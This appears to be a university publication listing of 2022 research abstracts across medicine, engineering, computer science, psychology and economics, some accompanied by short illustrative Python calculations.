Nanomedicine strategies were first adapted and successfully translated to clinical application for diseases such as cancer and diabetes. These strategies would no doubt benefit unmet disease needs, as in the case of leishmaniasis. The latter causes skin sores in the cutaneous form and affects internal organs in the visceral form. Treatment of cutaneous leishmaniasis (CL) aims at accelerating wound healing, reducing scarring and cosmetic morbidity, and preventing parasite transmission and relapse. Unfortunately, available treatments show only suboptimal effectiveness, and none of them were designed specifically for this disease condition. Tissue regeneration using nano-based devices coupled with drug delivery is currently being used in the clinic to address diabetic wounds. Thus, in this review, we analyse the current treatment options and critically assess the use of nanomedicine-based strategies to address CL wounds in view of achieving scarless wound healing, targeting secondary bacterial infection, and lowering drug toxicity.
Education for Sustainable Development (ESD, SDG 4) and human well-being (SDG 3) are among the central subjects of the Sustainable Development Goals (SDGs). In this article, based on the Questionnaire for Eudaimonic Well-Being (QEWB), we investigate to what extent (a) there is a connection between EWB and practical commitment to the SDGs and whether (b) there is a deficit in EWB among young people in general. We also want to use the article to draw attention to the need for further research on the links between human well-being and commitment to sustainable development. A total of 114 students between the ages of 18 and 34, who are either engaged in (extra)curricular activities related to sustainable development (28 students) or not (86 students), completed the QEWB. The students were interviewed twice: once regarding their current and once regarding their aspired EWB. Our results show that students who are actively engaged in activities for sustainable development report a higher EWB than non-active students. Furthermore, we show that students generally report deficits in EWB and wish for an improvement in their well-being. This especially applies to aspects of EWB related to self-discovery and the sense of meaning in life. Our study suggests that a practice-oriented ESD in particular can have a positive effect on the quality of life of young students and can support them in working on deficits in EWB.
Against the background of the Covid-19 pandemic, working from home has become widespread in Germany since 2020 and has since been adopted by many employers as a new way of working. Working from home can have various positive and negative effects on employees, employers, and society in general. To benefit from as many positive effects as possible, a sound home-office concept is required. This article outlines the requirements for such a concept and the basic prerequisites associated with working from home. Requirements of various kinds, from technical to social aspects, are considered, derived from a study conducted by the author. The focus of this article is on the critical success factors for ideal remote work, i.e., the requirements that are decisive for the successful implementation of a home-office concept and that influence the perceived effects of working from home. The study presented here was conducted as part of the thesis of Mr. Jeske, on which this article is based.
Novel methods for contingency analysis of gas transport networks are presented. They are motivated by the transition of our energy system where hydrogen plays a growing role. The novel methods are based on a specific method for topological reduction and so-called supernodes. Stationary Euler equations with advanced compressor thermodynamics and a gas law allowing for gas compositions with up to 100% hydrogen are used. Several measures and plots support an intuitive comparison and analysis of the results. In particular, it is shown that the newly developed methods can estimate locations and magnitudes of additional capacities (injection, buffering, storage etc.) with a reasonable performance for networks of relevant composition and size.
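For a single pipe, stationary isothermal gas flow is often approximated by a quadratic pressure-drop law of the form p_in² − p_out² = Λ·q·|q|. The sketch below uses this textbook simplification with a hypothetical friction coefficient; it is not the paper's full stationary Euler model with compressor thermodynamics and hydrogen-capable gas law:

```python
import math

def outlet_pressure(p_in_bar, flow, friction_coeff):
    """Stationary isothermal pipe flow: p_in^2 - p_out^2 = Lambda * q * |q|.

    p_in_bar       -- inlet pressure [bar]
    flow           -- volumetric flow q (sign encodes direction)
    friction_coeff -- lumped coefficient Lambda (pipe length, diameter,
                      roughness, gas properties); hypothetical value here
    """
    rhs = p_in_bar ** 2 - friction_coeff * flow * abs(flow)
    if rhs <= 0:
        raise ValueError("flow not sustainable at this inlet pressure")
    return math.sqrt(rhs)

# 60 bar inlet, flow 100 units, Lambda = 0.2:
print(outlet_pressure(60.0, 100.0, 0.2))  # 40.0
```

Network-level contingency analysis then couples many such pipe relations at nodes via mass conservation, which is where topological reduction and supernodes become useful.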
Comparative study of 3D object detection frameworks based on LiDAR data and sensor fusion techniques
(2022)
Estimating and understanding the surroundings of the vehicle precisely forms the basic and crucial step for an autonomous vehicle. The perception system plays a significant role in providing an accurate interpretation of a vehicle's environment in real time. Generally, the perception system involves various subsystems such as localization, detection and avoidance of (static and dynamic) obstacles, mapping systems, and others. To perceive the environment, these vehicles are equipped with various exteroceptive (both passive and active) sensors, in particular cameras, Radars, LiDARs, and others. These systems employ deep learning techniques that transform the huge amount of sensor data into semantic information on which the object detection and localization tasks are performed. For numerous driving tasks, accurate results require the location and depth information of a particular object. 3D object detection methods, by utilizing the additional pose data from sensors such as LiDARs and stereo cameras, provide information on the size and location of the object. Based on recent research, 3D object detection frameworks performing object detection and localization on LiDAR data and sensor fusion techniques show significant improvement in their performance. In this work, a comparative study is performed of the effect of using LiDAR data in object detection frameworks and of the performance improvement achieved by sensor fusion techniques, along with a discussion of various state-of-the-art methods in both cases, an experimental analysis, and future research directions.
As cameras are ubiquitous in autonomous systems, object detection is a crucial task. Object detectors are widely used in applications such as autonomous driving, healthcare, and robotics. Given an image, an object detector outputs both the bounding box coordinates as well as classification probabilities for each object detected. The state-of-the-art detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications in particular. It is therefore crucial to explain the reason behind each detector decision in order to gain user trust, enhance detector performance, and analyze their failure.
Previous work fails to explain and evaluate both bounding box and classification decisions individually for various detectors. Moreover, no tools exist that explain each detector decision, evaluate the explanations, and also identify the reasons for detector failures. This restricts the flexibility to analyze detectors. The main contribution presented here is an open-source Detector Explanation Toolkit (DExT), which is used to explain detector decisions, evaluate the explanations, and analyze detector errors. The detector decisions are explained visually by highlighting the image pixels that most influence a particular decision. The toolkit implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. To the author's knowledge, this is the first work to conduct extensive qualitative and novel quantitative evaluations of different explanation methods across various detectors. The qualitative evaluation incorporates a visual analysis of the explanations carried out by the author as well as a human-centric evaluation. The human-centric evaluation includes a user study to understand user trust in the explanations generated across various explanation methods for different detectors. Four multi-object visualization methods are provided to merge the explanations of multiple objects detected in an image, together with the corresponding detector outputs, into a single image. Finally, DExT implements the procedure to analyze detector failures using the formulated approach.
The visual analysis illustrates that the ability to explain a model depends more on the model itself than on the actual ability of the explanation method. In addition, the explanations are affected by the object explained, the decision explained, the detector architecture, the training data labels, and the model parameters. The results of the quantitative evaluation show that the Single Shot MultiBox Detector (SSD) is explained more faithfully than other detectors regardless of the explanation method. In addition, no single explanation method generates more faithful explanations than the others for both the bounding box and the classification decision across different detectors. Both the quantitative and human-centric evaluations identify SmoothGrad with Guided Backpropagation (GBP) as providing the most trustworthy explanations among the selected methods across all detectors. Finally, a convex polygon-based multi-object visualization method provides more human-understandable visualization than the other methods.
The author expects that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
Discrimination of Stressed and Non-Stressed Food-Related Bacteria Using Raman-Microspectroscopy
(2022)
As the identification of microorganisms becomes more significant in industry, so does the utilization of microspectroscopy and the development of effective chemometric models for data analysis and classification. Since microorganisms can only be identified when cultivated under laboratory conditions, yet are exposed to a variety of stress factors such as temperature differences, there is a demand for a method that can take these stress factors and the associated reactions of the bacteria into account. Therefore, bacterial stress reactions to lifetime conditions (regular treatment, 25 °C, HCl, 2-propanol, NaOH) and sampling conditions (cold sampling, desiccation, heat drying) were induced to explore the effects on Raman spectra in order to improve the chemometric models. Accordingly, in this study nine food-relevant bacteria were exposed to seven stress conditions in addition to routine cultivation as a control. Spectral alterations in lipids, polysaccharides, nucleic acids, and proteins were observed when compared to normal growth conditions without stresses. Regardless of the involvement of several stress factors and storage times, a model for differentiating the analyzed microorganisms from genus down to strain level was developed. Classification of the independent training dataset at genus and species level for Escherichia coli and at strain level for the other food-relevant microorganisms showed a classification rate of 97.6%.
The design of a fully superconducting wind power generator is influenced by several factors. Among them, a low number of pole pairs is desirable to achieve low AC losses in the superconducting stator winding, which greatly influences the cooling system design and, consequently, the efficiency of the entire wind power plant. However, it has been identified that a low number of pole pairs in a superconducting generator tends to greatly increase its output voltage, which in turn creates challenging conditions for the necessary power electronic converter. This study highlights the interdependencies between the design of a fully superconducting 10 MW wind power generator and the corresponding design of its power electronic converter.
Background: Cancer heterogeneity poses a serious challenge concerning the toxicity and adverse effects of therapeutic inhibitors, especially when it comes to combinatorial therapies that involve multiple targeted inhibitors. In particular, in non-small cell lung cancer (NSCLC), a number of studies have reported synergistic effects of drug combinations in preclinical models, while they were only partially successful in the clinical setup, suggesting that alternative clinical strategies (accounting for genetic background and immune response) should be considered. Herein, we investigated the antitumor effect of cytokine-induced killer (CIK) cells in combination with ALK and PD-1 inhibitors in vitro on genetically variable NSCLC cell lines.
Methods: We co-cultured three genetically different NSCLC cell lines, NCI-H2228 (EML4-ALK), A549 (KRAS mutation), and HCC-78 (ROS1 rearrangement), with and without nivolumab (PD-1 inhibitor) and crizotinib (ALK inhibitor). Additionally, we profiled the variability of surface expression of multiple immune checkpoints, absolute dead cell counts, and intracellular granzyme B in CIK cells using flow cytometry as well as RT-qPCR. ELISA and Western blot were performed to verify the activation of CIK cells.
Results: Our analysis showed that (a) nivolumab significantly weakened PD-1 surface expression on CIK cells without impacting other immune checkpoints or PD-1 mRNA expression, (b) this combination strategy showed an effective response in cell viability, IFN-γ production, and intracellular release of granzyme B in CD3+ CD56+ CIK cells, but solely in NCI-H2228, (c) the intrinsic expression of Fas ligand (FasL) as a T-cell activation marker in CIK cells was upregulated by this additive effect, and (d) nivolumab significantly increased Foxp3 expression in the CD4+CD25+ subpopulation of CIK cells. Taken together, we could show that CIK cells in combination with crizotinib and nivolumab can enhance the anti-tumor immune response through FasL activation, leading to increased IFN-γ and granzyme B, but only in NCI-H2228 cells with EML4-ALK rearrangement. We therefore hypothesize that CIK therapy may be a potential alternative for NSCLC patients harboring EML4-ALK rearrangement, and we support the idea that combination therapies offer significant potential when they are optimized on a patient-by-patient basis.
Process-induced changes in the morphology of biodegradable polybutylene adipate terephthalate (PBAT) and polylactic acid (PLA) blends modified with various multifunctional chain-extending cross-linkers (CECLs) are presented. The morphology of unmodified and modified films produced with blown film extrusion is examined in the extrusion direction (ED) and the transverse direction (TD). While FTIR analysis showed only small peak shifts, indicating that the CECLs modify the molecular weight of the PBAT/PLA blend, SEM investigations of the fracture surfaces of blown extrusion films revealed their significant effect on the morphology formed during processing. Due to the combined shear and elongation deformation during blown film extrusion, rather spherical PLA islands were partly transformed into long fibrils, which tended to decay into chains of elliptical islands if cooled slowly. The CECL introduction into the blend changed the thickness of the PLA fibrils, modified the interface adhesion, and altered the deformation behavior of the PBAT matrix from brittle to ductile. The results proved that CECLs react selectively with PBAT, PLA, and their interface. Furthermore, the reactions of CECLs with PBAT/PLA induced by the processing depended on the deformation directions (ED and TD), thus resulting in further non-uniformities of blown extrusion films.
ProtSTonKGs: A Sophisticated Transformer Trained on Protein Sequences, Text, and Knowledge Graphs
(2022)
While most approaches individually exploit unstructured data from the biomedical literature or structured data from biomedical knowledge graphs, their union can better exploit the advantages of both, ultimately improving representations of biology. Using multimodal transformers for such purposes can improve performance on context-dependent classification tasks, as demonstrated by our previous model, the Sophisticated Transformer Trained on Biomedical Text and Knowledge Graphs (STonKGs). In this work, we introduce ProtSTonKGs, a transformer aimed at learning all-encompassing representations of protein-protein interactions. ProtSTonKGs presents an extension to our previous work by adding textual protein descriptions and amino acid sequences (i.e., structural information) to the text- and knowledge-graph-based input sequence used in STonKGs. We benchmark ProtSTonKGs against STonKGs, resulting in F1 scores improved by up to 0.066 (i.e., from 0.204 to 0.270) in several tasks, such as predicting protein interactions in several contexts. Our work demonstrates how multimodal transformers can be used to integrate heterogeneous sources of information, laying the foundation for future approaches that use multiple modalities for biomedical applications.
Recovery Across Different Temporal Settings: How Lunchtime Activities Influence Evening Activities
(2022)
Recovery from work stress during workday breaks, free evenings, weekends, and vacations is known to benefit employee health and well-being. However, how recovery at different temporal settings is interconnected is not well understood. We hypothesized that on days when employees engage in recovery-enhancing lunchtime activities, they will experience higher resources when leaving work for home (i.e., low fatigue and high positive affect) and consequently spend more time on recovery-enhancing activities in the evening, thus creating a positive recovery cycle. In this study, 97 employees were randomized into lunchtime park walk and relaxation groups. As evening activities, we measured time spent on physical exercise, physical activity in natural surroundings, and social activities. Afternoon resources and time spent on evening activities were assessed twice a week before, during, and after the intervention, for five weeks. Our results based on multilevel analyses showed that on days when employees completed the lunchtime park walk, they spent more time on evening physical exercise and physical activity in natural surroundings compared to days when the lunch break was spent as usual. However, neither lunchtime relaxation exercises nor afternoon resources were associated with any of the evening activities. Our findings suggest that factors other than afternoon resources are more important in determining how much time employees spend on various evening activities. Fifteen-minute lunchtime park walks inspired employees to engage in similar health-benefitting activities during their free time.
Operating an ozone-evolving PEM electrolyser in tap water: A case study of water and ion transport
(2022)
While PEM water electrolysis could be a favourable technique for in situ sanitization with ozone, its application is mainly limited to the use of ultrapure water to achieve sufficient long-term stability. As additional charge carriers influence the occurring transport phenomena, we investigated the impact of different feed water qualities on the performance of a PEM tap water electrolyser for ozone evolution. The permeation of water and of the four most abundant cations (Na+, K+, Ca2+, Mg2+) is characterised during stand-by and powered operation at different charge densities to quantify the underlying transport mechanisms. Water transport is shown to increase linearly with the applied current (95 ± 2 mmol A−1 h−1) and occurs decoupled from ion permeation. Ion permeation is limited by the transfer of ions in water to the anode/PEM interface. The unstabilized operation of a PEM electrolyser in tap water leads to a pH gradient which promotes the formation of magnesium and calcium carbonates and hydroxides on the cathode surface. The introduction of a novel auxiliary cathode in the anolytic compartment has been shown to suppress ion permeation by close to 20%.
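The reported linear relationship between water transport and applied current can be applied directly; a minimal sketch using the fitted coefficient of 95 mmol A−1 h−1 (the ±2 uncertainty is ignored here for simplicity):

```python
def water_permeation_mmol(current_A, duration_h, coeff=95.0):
    """Water transport through the PEM, assumed strictly linear in the
    applied current. coeff is the fitted 95 mmol per A per h from the
    study; the reported +/- 2 uncertainty is not propagated here."""
    return coeff * current_A * duration_h

# Example: 2 A applied for 3 h:
print(water_permeation_mmol(2.0, 3.0))  # 570.0 mmol
```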
The utilization of simulation procedures is gaining increasing attention in the product development of extrusion blow molded parts. However, some simulation steps, like the simulation of shrinkage and warpage, are still associated with uncertainties. The reason for this is, on the one hand, a lack of standardized interfaces for the transfer of simulation data between different simulation tools, and on the other hand, the complex time-, temperature- and process-dependent material behavior of the semi-crystalline polymers used. Using a new vendor-neutral interface standard for the data transfer, the shrinkage analysis of a simple blow molded part is investigated and compared to experimental data. A linear viscoelastic material model in combination with an orthotropic process- and temperature-dependent thermal expansion coefficient is used for the shrinkage prediction. A good agreement is observed. Finally, critical parameters in the simulation models that strongly influence the shrinkage analysis are identified by a sensitivity study.
Jet engines of airplanes are designed such that damage in some components occurs and accumulates in service without being critical up to a certain damage level. Since maintenance, repair, and component exchange are very cost-intensive, it is necessary to predict the component lifetime efficiently and with high accuracy. A previously developed lifetime model, based on interpolated results of aerodynamic and structural mechanics simulations, uses material parameters estimated from literature values of standard creep experiments. For improved accuracy, an experimental procedure is developed for the characterization of the short-time creep behavior, which is relevant for the operation of turbine blades of jet engines. To consider microstructural influences resulting from the manufacturing of thin-walled single-crystal turbine blades, small-scale specimens from used turbine blades are extracted and tested in short- and medium-time creep experiments. Based on experimental results and literature values, a creep model, which describes the fracture behavior for a wide range of creep loads, is calibrated and is now used for the lifetime prediction of turbine blades under real loading conditions.
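A common starting point for calibrating such creep models is Norton's power law for the secondary creep rate with Arrhenius temperature dependence. The sketch below uses hypothetical material parameters for illustration; the calibrated model and parameters of the study are not reproduced here:

```python
import math

def norton_creep_rate(stress_MPa, temp_K, A=1e-10, n=5.0,
                      Q=300e3, R=8.314):
    """Secondary creep rate: eps_dot = A * sigma^n * exp(-Q / (R*T)).

    A, n (stress exponent), and Q (activation energy, J/mol) are
    hypothetical values; in practice they are calibrated against creep
    experiments such as those described above. R is the gas constant.
    """
    return A * stress_MPa ** n * math.exp(-Q / (R * temp_K))

# Higher temperature at equal stress accelerates creep:
rate_hot = norton_creep_rate(200.0, 1250.0)
rate_cold = norton_creep_rate(200.0, 1150.0)
print(rate_hot > rate_cold)  # True
```

Calibration then amounts to fitting A, n, and Q so that predicted rupture times match the short- and medium-time creep experiments on the extracted small-scale specimens.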
Hydrogen is a versatile energy carrier. When produced with renewable energy by water splitting, it is a carbon neutral alternative to fossil fuels. The industrialization process of this technology is currently dominated by electrolyzers powered by solar or wind energy. For small scale applications, however, more integrated device designs for water splitting using solar energy might optimize hydrogen production due to lower balance of system costs and a smarter thermal management. Such devices offer the opportunity to thermally couple the solar cell and the electrochemical compartment. In this way, heat losses in the absorber can be turned into an efficiency boost for the device via simultaneously enhancing the catalytic performance of the water splitting reactions, cooling the absorber, and decreasing the ohmic losses.[1,2] However, integrated devices (sometimes also referred to as “artificial leaves”) currently suffer from a lower technology readiness level (TRL) than the completely decoupled approach.
The Quality of Quality Assessment: Review Articles in Classic and Modern Video Game Journalism
(2022)
The heyday of printed video game journalism around the turn of the millennium is over. For more than 15 years, the circulation of classic video game magazines such as Gamestar or PC Games has been declining. Other magazines, among them PC Action and the former market leader Computer Bild Spiele, have since been discontinued for economic reasons. Nevertheless, a journalistic countermovement developed, which Kieron Gillen founded in 2004 with his manifesto "The New Games Journalism". In Germany, video game magazines such as GAIN or WASD emerged whose reporting perceives video games less as a product and increasingly as an artistic object, placing them in a social and cultural context.
Regardless of these developments, editorial teams still carry out a technical and content-related assessment of video games, which is presented to the audience as a review article. Since, from a historical perspective, this is the core content of video game magazines, it serves as the object of analysis of this thesis and as an indicator of the quality of the magazines as a whole. In view of the differing developments in video game journalism, the following question is to be answered: Do modern video game magazines offer higher quality than classic magazines? To this end, a qualitative content analysis of the review articles is conducted and compared against established quality criteria from general journalism as well as from trade, service, and video game journalism.
Contract-based nature protection schemes are a voluntary mechanism, with a limited contract duration, that aim to raise the acceptance of biodiversity conservation practices in agriculture among farmers and other land users. The purpose of this paper is to analyse the institutional settings of contract-based nature protection based on the “Institutions of Sustainability” (IoS) framework in the German Rhine-Sieg district, and to outline the way in which policy measures should be designed to encourage farmers to participate in contract-based nature protection programmes. This was achieved by answering research questions to identify the challenges, potentials and obstacles of a contract-based nature protection scheme in different “sub-arenas” as defined in the IoS framework. Qualitative research methods were used. The analysis shows that the main constraints for successful implementation of contract-based nature protection schemes are the limited consideration of the impact of climate change during the contract period, the limited consideration of regional conditions as regards the measures taken on the ground, and an inflexible contract duration.
Research has identified nudging as a promising and effective tool to improve healthy eating behavior in a cafeteria setting. However, it remains unclear who is and who is not “nudgeable” (susceptible to nudges). An important influencing factor at the individual level is nudge acceptance. While some progress has been made in determining influences on the acceptance of healthy eating nudges, research on how personal characteristics (such as the perception of social norms) affect nudge acceptance remains scarce. We conducted a survey of 1032 university students to assess the acceptance of nine different types of healthy eating nudges in a cafeteria setting with four influential factors (social norms, health-promoting collaboration, responsibility to promote healthy eating, and procrastination). These factors are likely to play a role within a university and a cafeteria setting. The present study showed that key influential factors of nudge acceptance were the perceived responsibility to promote healthy eating and health-promoting collaboration. We also identified three different student clusters with respect to nudge acceptance, demonstrating that not all nudges were accepted equally. In particular, default, salience, and priming nudges were at least moderately accepted regardless of the degree of nudgeability. Our findings provide useful policy implications for nudge development by university, cafeteria, and public health officials. Recommendations are formulated for strengthening the theoretical background of nudge acceptance and the susceptibility to nudges.
Contextual information is widely considered for NLP and knowledge discovery in life sciences since it highly influences the exact meaning of natural language. The scientific challenge is not only to extract such context data, but also to store this data for further query and discovery approaches. Classical approaches use RDF triple stores, which have serious limitations. Here, we propose a multiple step knowledge graph approach using labeled property graphs based on polyglot persistence systems to utilize context data for context mining, graph queries, knowledge discovery and extraction. We introduce the graph-theoretic foundation for a general context concept within semantic networks and show a proof of concept based on biomedical literature and text mining. Our test system contains a knowledge graph derived from the entirety of PubMed and SCAIView data and is enriched with text mining data and domain-specific language data using Biological Expression Language. Here, context is a more general concept than annotations. This dense graph has more than 71M nodes and 850M relationships. We discuss the impact of this novel approach with 27 real-world use cases represented by graph queries. Storing and querying a giant knowledge graph as a labeled property graph is still a technological challenge. Here, we demonstrate how our data model is able to support the understanding and interpretation of biomedical data. We present several real-world use cases that utilize our massive, generated knowledge graph derived from PubMed data and enriched with additional contextual data. Finally, we show a working example in context of biologically relevant information using SCAIView.
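The advantage of labeled property graphs over RDF triples described above is that context can live directly on relationships as properties. A minimal in-memory sketch of this data model and a context-filtered query follows; the node names, relationship types, and context values are illustrative assumptions, not the actual schema of the described system.

```python
# Toy labeled property graph: nodes carry labels and properties;
# relationships carry a type plus context properties. In plain RDF triples,
# attaching context to an edge would require reification.
nodes = {
    1: {"labels": {"Entity"}, "props": {"name": "TP53"}},
    2: {"labels": {"Entity"}, "props": {"name": "apoptosis"}},
}
relationships = [
    {"start": 1, "end": 2, "type": "ASSOCIATED_WITH",
     "props": {"context": "cancer", "source_pmid": "12345"}},
    {"start": 1, "end": 2, "type": "ASSOCIATED_WITH",
     "props": {"context": "neurodegeneration", "source_pmid": "67890"}},
]

def query(rel_type, context):
    """Return (start_name, end_name) pairs whose relationship matches
    both the requested type and the requested context value."""
    return [
        (nodes[r["start"]]["props"]["name"], nodes[r["end"]]["props"]["name"])
        for r in relationships
        if r["type"] == rel_type and r["props"].get("context") == context
    ]
```

In a production graph database the same query would be expressed declaratively (e.g., in a graph query language) rather than by list iteration, but the data model is the same.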
Unlimited paid time off policies are currently fashionable and widely discussed by HR professionals around the globe. While on the one hand, paid time off is considered a key benefit by employees and unlimited paid time off policies (UPTO) are seen as a major perk which may help in recruiting and retaining talented employees, on the other hand, early adopters reported that employees took less time off than previously, presumably leading to higher burnout rates. In this conceptual review, we discuss the theoretical and empirical evidence regarding the potential effects of UPTO on leave utilization, well-being and performance outcomes. We start out by defining UPTO and placing it in a historical and international perspective. Next, we discuss the key role of leave utilization in translating UPTO into concrete actions. The core of our article constitutes the description of the effects of UPTO and the two pathways through which these effects are assumed to unfold: autonomy need satisfaction and detrimental social processes. We moreover discuss the boundary conditions which facilitate or inhibit the successful utilization of UPTO on individual, team, and organizational level. In reviewing the literature from different fields and integrating existing theories, we arrive at a conceptual model and five propositions, which can guide future research on UPTO. We conclude with a discussion of the theoretical and societal implications of UPTO.
Composite nanoparticles (NPs) consisting of lignin and different polysaccharide (PS) derivatives were prepared. In this synergistic approach, the PS derivative acts as biocompatible matrix that forms spherical NPs while lignin is a functional compound with therapeutic potential (e.g., antioxidative, antimicrobial, antiviral). Organosolv lignin and three different PS derivatives (cellulose acetate/CA, cellulose acetate phthalate/CAPh, xylan phenyl carbonate/XPC) were used in this study. Nanocomposites with particle sizes in the range of about 200–550 nm containing both types of biopolymers are accessible by dialysis of organic PS/lignin solutions against water. In particular, XPC and CAPh, which both contain aromatic substituents, were found to be suitable for incorporation of lignin within the PS nanomatrix. The present work paves the way for future studies in which the pharmaceutical potential and biocompatibility of composite NPs of lignin and PS derivatives with tailored properties are investigated.
Characterization methods for pressure sensitive adhesives (PSA) originate from technical bonding and do not cover data relevant for the development and quality assurance of medical applications, where PSAs with flexible backing layers are applied to human skin. In this study, a new method called RheoTack is developed to determine, mechanically and optically, the adhesion and detachment behavior of flexible and transparent PSA-based patches. Transdermal therapeutic systems (TTS) consisting of silicone-based PSAs on a flexible and transparent backing layer were tested on a rotational rheometer with an 8 mm plate as a probe rod at retraction speeds of 0.01, 0.1, and 1 mm/s with respect to their adhesion and detachment behavior in terms of force-retraction displacement curves. The curves consist of a compression phase to ensure wetting; a tensile deformation phase comprising stretching, cavity formation, and fibril formation; and a failure phase with detachment. Their analysis provides values for stiffness, the force and displacement at the onset of fibril formation, the force and displacement at the onset of failure due to fibril breakage and detachment, as well as corresponding activation energies. All these parameters exhibit a pronounced dependency on the retraction speed. The force-retraction displacement curves, together with simultaneous video recordings of the TTS deformation from three different angles (three cameras), provide deeper insight into the deformation processes and allow the characteristics relevant for PSA applications to be interpreted.
The Poverty Reduction Effect of Social Protection: The Pros and Cons of a Multidisciplinary Approach
(2022)
There is a growing body of knowledge on the complex effects of social protection on poverty in Africa. This article explores the pros and cons of a multidisciplinary approach to studying social protection policies. Our research aimed at studying the interaction between cash transfers and social health protection policies in terms of their impact on inclusive growth in Ghana and Kenya. Also, it explored the policy reform context over time to unravel programme dynamics and outcomes. The analysis combined econometric and qualitative impact assessments with national- and local-level political economic analyses. In particular, dynamic effects and improved understanding of processes are well captured by this approach, thus pushing the understanding of implementation challenges over and beyond a ‘technological fix,’ as has been argued before by Niño-Zarazúa et al. (World Dev 40:163–176, 2012). However, multidisciplinary research puts considerable demands on data and data handling. Finally, some poverty reduction effects play out over a longer time, requiring consistent longitudinal data that is still scarce.
Purpose: Both Hungary and Germany belong to the old-world wine-producing countries and have long winemaking traditions. This paper aims to explore and compare online branding strategies of family SME (small and medium-sized enterprise) wineries at Lake Balaton (Hungary) and Lake Constance (Germany), as two wine regions with similar geographic characteristics.
Design/methodology/approach: This paper, based on a total sample of 37 family wineries, 15 at Lake Balaton and 22 at Lake Constance, investigates the differences in brand identity on the website, brand image in social media and online communication channels deployed in both wine regions. The study applies a qualitative methodology using MaxQDA software for conducting content analysis of texts in websites and social media. Descriptive statistics and t-test were conducted to compare the usage of different communication channels and determine statistical significance.
Findings: At Lake Balaton, the vineyard, the winery and the family, while at Lake Constance, the lake itself and the grape are highlighted regarding family winery brand identity. The customer-based brand image of Hungarian family wineries emphasizes wine, food and service, with the predominant use of Facebook. In the German family wineries, the focus of brand identity is on wine, friendliness and taste and includes more extensive usage of websites.
Originality/value: The paper deploys a novel methodology, both in terms of tools used as well as geographic focus to uncover online branding patterns of family wineries, thereby providing implications for wine and tourism industries at lake regions. It compares the share of selected most-used words in the overall text in websites and in social media, and presents the key findings from this innovative approach.
Effective Neighborhood Feature Exploitation in Graph CNNs for Point Cloud Object-Part Segmentation
(2022)
Part segmentation is the task of semantic segmentation applied on objects and carries a wide range of applications from robotic manipulation to medical imaging. This work deals with the problem of part segmentation on raw, unordered point clouds of 3D objects. While pioneering works on deep learning for point clouds typically ignore taking advantage of local geometric structure around individual points, the subsequent methods proposed to extract features by exploiting local geometry have not yielded significant improvements either. In order to investigate further, a graph convolutional network (GCN) is used in this work in an attempt to increase the effectiveness of such neighborhood feature exploitation approaches. Most of the previous works also focus only on segmenting complete point cloud data. Considering the impracticality of such approaches in real-world scenarios, where complete point clouds are scarcely available, this work proposes approaches to deal with partial point cloud segmentation.
In the attempt to better capture neighborhood features, this work proposes a novel method to learn regional part descriptors which guide and refine the segmentation predictions. The proposed approach helps the network achieve state-of-the-art performance of 86.4% mIoU on the ShapeNetPart dataset for methods which do not use any preprocessing techniques or voting strategies. In order to better deal with partial point clouds, this work also proposes new strategies to train and test on partial data. While achieving significant improvements compared to the baseline performance, the problem of partial point cloud segmentation is also viewed through an alternate lens of semantic shape completion.
Semantic shape completion networks not only help deal with partial point cloud segmentation but also enrich the information captured by the system by predicting complete point clouds with corresponding semantic labels for each point. To this end, a new network architecture for semantic shape completion is also proposed based on the point completion network (PCN), which takes advantage of a graph convolution based hierarchical decoder for completion as well as segmentation. In addition to predicting complete point clouds, results indicate that the network reaches within 5% of the mIoU performance of dedicated segmentation networks for partial point cloud segmentation.
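The mIoU metric used throughout the evaluation above can be sketched as follows. Exact ShapeNetPart protocols differ in how IoUs are averaged (per shape vs. per category), so this is an illustrative per-shape variant, not the paper's evaluation code.

```python
def shape_miou(pred, gt, num_parts):
    """Mean intersection-over-union across the part labels of one shape.

    pred, gt: equal-length lists of integer part labels, one per point.
    A part absent from both prediction and ground truth counts as IoU 1,
    following a common convention for part segmentation benchmarks.
    """
    ious = []
    for part in range(num_parts):
        inter = sum(1 for p, g in zip(pred, gt) if p == part and g == part)
        union = sum(1 for p, g in zip(pred, gt) if p == part or g == part)
        ious.append(1.0 if union == 0 else inter / union)
    return sum(ious) / num_parts
```

Averaging `shape_miou` over all shapes in the test set yields the kind of instance-averaged mIoU figure (e.g., 86.4%) reported above.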